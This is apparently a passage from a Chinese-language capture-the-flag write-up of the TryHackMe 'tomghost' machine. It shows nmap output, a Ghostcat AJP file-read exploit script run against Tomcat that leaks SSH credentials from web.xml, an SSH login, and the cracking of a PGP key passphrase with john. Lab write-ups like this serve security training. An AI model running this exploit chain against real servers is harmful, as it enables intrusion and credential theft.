PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 60 53/tcp open domain syn-ack ttl 60 8009/tcp open ajp13 syn-ack ttl 60 8080/tcp open http-proxy syn-ack ttl 60
Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds Raw packets sent: 8 (328B) | Rcvd: 5 (216B)
进一步进行版本探测
1 2 3 4 5 6 7 8 9
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 53/tcp open tcpwrapped syn-ack ttl 60 8009/tcp open ajp13 syn-ack ttl 60 Apache Jserv (Protocol v1.3) 8080/tcp open http syn-ack ttl 60 Apache Tomcat 9.0.30 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
positional arguments: target Hostname or IP to attack
options: -h, --help show this help message and exit -p PORT, --port PORT AJP port to attack (default is 8009) -f FILE, --file FILE file path :(WEB-INF/web.xml)
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.10.211.222 ----------------------------------- 目标: 10.10.211.222 端口: 8009 文件:WEB-INF/web.xml ----------------------------------- Getting resource at ajp13://10.10.211.222:8009/asdf ---------------------------- <?xml version="1.0" encoding="UTF-8"?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0" metadata-complete="true">
<display-name>Welcome to Tomcat</display-name> <description> Welcome to GhostCat skyfuck:8730281lkjlkjdqlksalks </description>
</web-app>
webshell
usershell
ssh登录
1
skyfuck:8730281lkjlkjdqlksalks
1 2 3 4 5 6 7 8 9 10 11 12
skyfuck@ubuntu:~$ ls -la total 40 drwxr-xr-x 3 skyfuck skyfuck 4096 Nov 16 00:44 . drwxr-xr-x 4 root root 4096 Mar 10 2020 .. -rw------- 1 skyfuck skyfuck 136 Mar 10 2020 .bash_history -rw-r--r-- 1 skyfuck skyfuck 220 Mar 10 2020 .bash_logout -rw-r--r-- 1 skyfuck skyfuck 3771 Mar 10 2020 .bashrc drwx------ 2 skyfuck skyfuck 4096 Nov 16 00:44 .cache -rw-rw-r-- 1 skyfuck skyfuck 394 Mar 10 2020 credential.pgp -rw-r--r-- 1 skyfuck skyfuck 655 Mar 10 2020 .profile -rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10 2020 tryhackme.asc
┌──(kali㉿kali)-[~/Documents/thm/tomghost] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65536 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status alexandru (tryhackme) 1g 0:00:00:00 DONE (2024-11-16 03:55) 25.00g/s 26800p/s 26800c/s 26800C/s theresa..alexandru Use the "--show" option to display all of the cracked passwords reliably Session completed.
